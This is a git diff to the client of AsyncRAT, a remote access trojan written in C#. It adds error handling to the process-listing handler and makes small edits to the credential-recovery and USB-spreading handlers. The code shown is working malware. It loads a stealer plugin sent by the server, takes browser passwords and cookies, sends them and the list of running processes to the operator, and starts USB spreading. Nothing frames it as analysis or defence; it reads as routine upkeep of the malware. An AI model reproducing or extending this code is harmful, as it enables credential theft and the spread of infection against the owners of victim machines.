diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleProcessManager.cs b/AsyncRAT-C#/Client/Handle Packet/HandleProcessManager.cs index fe95551..3a4cd3f 100644 --- a/AsyncRAT-C#/Client/Handle Packet/HandleProcessManager.cs +++ b/AsyncRAT-C#/Client/Handle Packet/HandleProcessManager.cs @@ -31,37 +31,41 @@ namespace Client.Handle_Packet public void ProcessList() { - StringBuilder sb = new StringBuilder(); - var query = "SELECT ProcessId, Name, ExecutablePath FROM Win32_Process"; - using (var searcher = new ManagementObjectSearcher(query)) - using (var results = searcher.Get()) + try { - var processes = results.Cast().Select(x => new + StringBuilder sb = new StringBuilder(); + var query = "SELECT ProcessId, Name, ExecutablePath FROM Win32_Process"; + using (var searcher = new ManagementObjectSearcher(query)) + using (var results = searcher.Get()) { - ProcessId = (UInt32)x["ProcessId"], - Name = (string)x["Name"], - ExecutablePath = (string)x["ExecutablePath"] - }); - foreach (var p in processes) - { - if (File.Exists(p.ExecutablePath)) + var processes = results.Cast().Select(x => new { - string name = p.ExecutablePath; - string key = p.ProcessId.ToString(); - Icon icon = Icon.ExtractAssociatedIcon(p.ExecutablePath); - Bitmap bmpIcon = icon.ToBitmap(); - using (MemoryStream ms = new MemoryStream()) + ProcessId = (UInt32)x["ProcessId"], + Name = (string)x["Name"], + ExecutablePath = (string)x["ExecutablePath"] + }); + foreach (var p in processes) + { + if (File.Exists(p.ExecutablePath)) { - bmpIcon.Save(ms, ImageFormat.Png); - sb.Append(name + "-=>" + key + "-=>" + Convert.ToBase64String(ms.ToArray()) + "-=>"); + string name = p.ExecutablePath; + string key = p.ProcessId.ToString(); + Icon icon = Icon.ExtractAssociatedIcon(p.ExecutablePath); + Bitmap bmpIcon = icon.ToBitmap(); + using (MemoryStream ms = new MemoryStream()) + { + bmpIcon.Save(ms, ImageFormat.Png); + sb.Append(name + "-=>" + key + "-=>" + Convert.ToBase64String(ms.ToArray()) + "-=>"); + } } } } + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Packet").AsString = "processManager"; + msgpack.ForcePathObject("Message").AsString = sb.ToString(); + ClientSocket.Send(msgpack.Encode2Bytes()); } - MsgPack msgpack = new MsgPack(); - msgpack.ForcePathObject("Packet").AsString = "processManager"; - msgpack.ForcePathObject("Message").AsString = sb.ToString(); - ClientSocket.Send(msgpack.Encode2Bytes()); + catch { } } } diff --git a/AsyncRAT-C#/Client/Handle Packet/HandlerRecovery.cs b/AsyncRAT-C#/Client/Handle Packet/HandlerRecovery.cs index 270eb8f..9e32ab1 100644 --- a/AsyncRAT-C#/Client/Handle Packet/HandlerRecovery.cs +++ b/AsyncRAT-C#/Client/Handle Packet/HandlerRecovery.cs @@ -18,11 +18,11 @@ namespace Client.Handle_Packet Assembly loader = Assembly.Load(unpack_msgpack.ForcePathObject("Plugin").GetAsBytes()); MethodInfo meth = loader.GetType("StealerLib.Browsers.CaptureBrowsers").GetMethod("RecoverCredential"); MethodInfo meth2 = loader.GetType("StealerLib.Browsers.CaptureBrowsers").GetMethod("RecoverCookies"); - object InjObj = loader.CreateInstance(meth.Name); + object injObj = loader.CreateInstance(meth.Name); MsgPack msgpack = new MsgPack(); msgpack.ForcePathObject("Packet").AsString = "recoveryPassword"; - msgpack.ForcePathObject("Password").AsString = (string)meth.Invoke(InjObj, null); - msgpack.ForcePathObject("Cookies").AsString = (string)meth2.Invoke(InjObj, null); + msgpack.ForcePathObject("Password").AsString = (string)meth.Invoke(injObj, null); + msgpack.ForcePathObject("Cookies").AsString = (string)meth2.Invoke(injObj, null); ClientSocket.Send(msgpack.Encode2Bytes()); } catch (Exception ex) diff --git a/AsyncRAT-C#/Client/Handle Packet/Packet.cs b/AsyncRAT-C#/Client/Handle Packet/Packet.cs index 701dc57..f16ffb2 100644 --- a/AsyncRAT-C#/Client/Handle Packet/Packet.cs +++ b/AsyncRAT-C#/Client/Handle Packet/Packet.cs @@ -101,7 +101,7 @@ namespace Client.Handle_Packet case "usbSpread": { - new HandleLimeUSB().Run(); + new HandleLimeUSB(unpack_msgpack); break; }